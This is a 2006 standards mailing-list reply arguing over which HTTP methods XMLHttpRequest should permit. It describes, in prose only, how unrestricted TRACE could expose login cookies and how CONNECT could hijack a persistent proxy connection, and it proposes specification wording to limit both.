Re: Extension methods & XMLHttpRequest

Roy T. Fielding wrote:
> What browsers need to do is obey the specs.  TRACE is not a problem.
> If the browser sends already-non-secure cookies on a TRACE request,
> then the response is going to contain those cookies.

Eh?  What makes a cookie already-non-secure, as opposed to secure cookies?

The reasons given for blocking TRACE are to protect against a certain
type of cross-site scripting attack.  This is the example:

Site A is a wiki/blog which does not adequately sanitise content
posted to it.  There is no shortage of these.

A user logs on to site A, where a script maliciously posted loads into
the user's browser and starts doing things it shouldn't.  One of those
things is to send a TRACE to site A, look at the cookies returned
(cookies used to login to the site), and post those cookies to another
page on site A.

The hacker who posted the script can then retrieve the user's cookies,
and use them to impersonate the user at other times, if the cookies
are used as login credentials, which is of course common.

Your suggestion seems to be that the browser should allow TRACE but
not post cookies with the TRACE request.  There are two approaches to
that:

    1. The browser does not post cookies with _any_ XMLHttpRequest.
       That's very unhelpful - they are useful.

    2. The browser has a special rule for TRACE.

The third approach, which I suspect you have in mind, is that site A
should properly sanitise whatever is posted to it.  If site A doesn't
do that well enough, it's site A's own security hole.

Indeed, the fact that a malicious script can post to the site
indicates a serious hole.

But our job as designers of the Javascript sandbox is to limit the
damage which can be done by a script.

Being able to post to a site is one type of damange, which might be
considered serious or not, depending on the application.  Being able
to post the user's login credentials for someone else to use is
perhaps more serious.

That's the motivation for prohibiting TRACE, or for limiting the
headers which will be sent with TRACE to those which don't reveal
security information.  It's a type of damage limitation along a fairly
clear boundary: don't allow a script direct access to security credentials.

> So don't do that.  Don't whitelist methods -- whitelist the
> information the browser is allowed to send in *any* request.  Allow
> the user to configure the browser differently when new information
> is needed.

Perhaps.  But it's clear that ordinary cookies are useful with
XMLHttpRequest GET/POST requests.

> CONNECT is a protocol switch.  The only real risks for CONNECT are
> for proxies that are tricked into connecting to the reserved ports
> of older protocols.

No, there is another risk which is equally serious.

Example: Site A is a dodgy site which someone visits (let's say by
accident).  Site B is the user's bank.

The user visits site A, which sends a page containing a script which
uses XMLHttpRequest to send a CONNECT request.  The request is
processed by a proxy between the user and site A, and the proxy
processes it by connecting to port 443 on site A, successfully.

The user (shocked at the pictures) quickly closes their window, then
later connects to site B.

The browser then sends requests to site B *using the same connection
to their proxy*.  Persistent HTTP does this.

This assumes the browser did not recognise XMLHttpRequest + CONNECT as
different from other request methods.

This means the browser sends subsequent requests for site B to site A.
Site A can proxy them (silently) to site B, and thus accomplishes a
stealth phishing attack.  Nothing shows in the URL bar; only sniffing
the network would reveal the requests are hijacked.

There's a couple of obvious ways to prevent this:

    1. Don't allow CONNECT with XMLHttpRequest.

or

    2. Ensure the browser treats CONNECT differently than other
       methods with XMLHttpRequest: by marking the connection as
       non-reusable.

> All HTTP methods fall into safe/unsafe categories.  It is absolutely
> necessary that the browser distinguish between safe requests
> (hyperlinks) and unsafe requests (a la buttons).  That is a browser
> GUI issue and, for scripting, requires a user ack prior to sending the
> unsafe request.  By default, all unknown methods should be considered
> unsafe until the user configures otherwise.  There is no need for the
> *protocols* to define whitelists when the developers can do so on
> their own, based on their own applications, and according to their
> own user needs.

I agree with you, that the browser GUI should be the place where
ultimately whitelist/blacklist/whatever policy is configured.  This is
no different than, for example, whether a script is allowed to access
local files, or do cross-domain requests.

However I think it makes good sense for the XMLHttpRequest
recommendation to _recommend_ a common policy.

After all the whole point of the recommendation document is to provide
some common ground where people know what is likely to work (or will
when browsers claim compliance with the recommendation) without user
intervention, and what is not likely to work in that way.

In those terms, a whitelist makes sense.  So something like this:

    Implementations which conform to this recommendation support at
    minimum GET and POST requests to the same domain without user
    intervention.  Cookies, Accept etc. will be sent with these
    requests as with ordinary page requests.  (Script authors can
    depend on this).

    Implementations MAY allow other request methods, MAY allow
    cross-domain requests, MAY require user intervention to enable any
    of these things, and MAY apply implementation-defined restrictions
    on what combinations are allowed.  However, implementations do not
    have to allow any of these things to conform to this
    recommendation.

-- Jamie

Received on Sunday, 11 June 2006 20:06:40 UTC